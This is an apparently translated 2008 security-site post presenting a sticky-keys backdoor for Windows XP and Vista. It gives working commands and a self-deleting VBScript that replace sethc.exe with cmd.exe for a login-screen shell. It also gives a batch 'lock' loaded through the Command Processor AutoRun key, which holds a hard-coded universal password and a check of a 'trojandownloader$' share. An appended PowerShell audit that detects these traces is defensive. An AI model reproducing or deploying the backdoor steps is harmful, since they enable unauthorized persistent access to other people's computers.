Using sticky keys to create a very cool backdoor for intruding into Vista systems - Vulnerability warning - the black bar safety net

ID MYHACK58:62200818938
Type myhack58
Reporter Anonymous
Modified 2008-05-02T00:00:00


Source: the sun

What are sticky keys? What do you see after pressing the Shift key five times in a row on a Windows operating system? On Windows 2000/XP/Vista, pressing the Shift key five times opens Sticky Keys, which runs sethc.exe, and this also works at the login screen. This is reminiscent of the Windows screensaver trick: if the program is replaced with cmd.exe, you can open a shell.

First, the concrete replacement method:

XP system: eject the installation source disc (or rename the installation directory on the hard disk), then:

    cd %windir%\system32\dllcache
    ren sethc.exe *.ex~
    cd %windir%\system32
    copy /y cmd.exe sethc.exe

Vista system:

    takeown /f c:\windows\system32\sethc.exe
    cacls c:\windows\system32\sethc.exe /G administrator:F

The two commands above obtain the permissions. You can also use the Vista optimization guru to add an elevation entry to the right-click menu, then right-click the sethc.exe file to elevate permissions directly. Then replace the file using the XP method. At the login screen, press Shift five times to bring up a cmd shell, and then......

Second, extending the backdoor:

    Dim obj, success
    Set obj = CreateObject("WScript.Shell")
    ' Take ownership of sethc.exe and grant the current user full control
    success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)
    success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)
    ' Keep copies of both files, then put the cmd.exe copy in place of sethc.exe
    success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)
    success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)
    success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)
    success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

The second line is the most interesting: it answers the prompt automatically.... I've encountered similar problems before.

Then an update: add self-deletion and simplify the code:

    On Error Resume Next
    Dim obj, success
    Set obj = CreateObject("WScript.Shell")
    ' Same steps as above, chained into a single cmd invocation
    success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
    ' The script deletes itself when done
    CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

Third, locking the backdoor:

allyesno's note: you can use a cmd lock to add password authentication to the cmd shell.

To use the backdoor lock below, save the code as bdlock.bat, then modify the registry location:

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
    "AutoRun"="bdlock.bat"

    @Echo Off
    title back door login authentication
    color a
    cls
    set temprandom=%RANDOM%
    echo please enter the verification code:%temprandom%
    set/p check=
    if "%check%"=="%temprandom%%temprandom%" goto passcheck
    if "%check%"=="%temprandom%" (
    rem Backdoor server authentication
    rem If there is no backdoor authentication server, comment out the following line
    if exist \\trojandownloader$\pass goto passcheck
    )
    echo verify failed
    pause
    exit
    :passcheck
    echo verification successful
    If "%passcmdlock%"== Goto endx
    Set passcmdlock=http://www.6655.com/
    :allyesno
    Set Errorlevel=>nul
    Echo please enter the verification code?
    Set password=allyesno Is a pig>nul
    Set/p password=
    rem universal password
    if "%password%"=="allyesno is a sb" goto endx
    If %time:~1,1%==0 Set timechange=a
    If %time:~1,1%==1 Set timechange=b
    If %time:~1,1%==2 Set timechange=c
    If %time:~1,1%==3 Set timechange=d
    If %time:~1,1%==4 Set timechange=e
    If %time:~1,1%==5 Set timechange=f
    If %time:~1,1%==6 Set timechange=g
    If %time:~1,1%==7 Set timechange=h
    If %time:~1,1%==8 Set timechange=i
    If %time:~1,1%==9 Set timechange=j
    set/a sum=%time:~1,1%+%time:~1,1%
    Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul
    If "%errorlevel%"=="0" cls&Echo the password is correct&Goto End
    Echo please contact for the correct password!&Goto allyesno
    :End
    Set password=>nul
    Set Errorlevel=>nul
    :endx
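
A host audit for the traces these steps leave behind, as an added example that is not part of the original article: it flags a sethc.exe that is byte-identical to cmd.exe or no longer owned by TrustedInstaller, the leftover asethc.exe and acmd.exe copies, and a Command Processor AutoRun value. Assumptions: PowerShell 4.0 or later in a 64-bit session on Vista or later; the function name Find-StickyKeysTamper is hypothetical, and the HKCU hive is checked in addition to the HKLM key the article names.

```powershell
# Added example, not from the original article. Run in 64-bit PowerShell 4.0+;
# a 32-bit session is redirected to SysWOW64 and would inspect the wrong files.
function Find-StickyKeysTamper {   # hypothetical name
    $sys32 = Join-Path $env:SystemRoot 'System32'
    $sethc = Join-Path $sys32 'sethc.exe'
    $cmd   = Join-Path $sys32 'cmd.exe'
    $found = @()

    if (-not (Test-Path -LiteralPath $sethc -PathType Leaf)) {
        $found += 'sethc.exe is missing'
    } else {
        # The article copies cmd.exe over sethc.exe, so equal hashes mean a swap.
        $sethcHash = (Get-FileHash -LiteralPath $sethc -Algorithm SHA256).Hash
        $cmdHash   = (Get-FileHash -LiteralPath $cmd -Algorithm SHA256).Hash
        if ($sethcHash -eq $cmdHash) { $found += 'sethc.exe is byte-identical to cmd.exe' }

        # takeown changes the file owner. Assumption: Vista or later, where the
        # default owner of system binaries is TrustedInstaller (SID below).
        $tiSid = 'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'
        $owner = (Get-Acl -LiteralPath $sethc).GetOwner([System.Security.Principal.SecurityIdentifier]).Value
        if ($owner -ne $tiSid) { $found += "sethc.exe owner is $owner, not TrustedInstaller" }
    }

    # Backup copies named in the article's script.
    foreach ($name in 'asethc.exe', 'acmd.exe') {
        $path = Join-Path $sys32 $name
        if (Test-Path -LiteralPath $path) { $found += "leftover file: $path" }
    }

    # The lock step runs bdlock.bat on every cmd.exe start through AutoRun.
    foreach ($hive in 'HKLM:', 'HKCU:') {
        $key = "$hive\SOFTWARE\Microsoft\Command Processor"
        $val = (Get-ItemProperty -Path $key -Name AutoRun -ErrorAction SilentlyContinue).AutoRun
        if ($val) { $found += "$key AutoRun = $val" }
    }
    $found
}

$result = Find-StickyKeysTamper
if ($result) { $result } else { 'No sticky-keys tampering indicators found' }
```

An owner mismatch or an AutoRun value alone can have a legitimate cause, so treat each line as something to investigate rather than as proof of compromise.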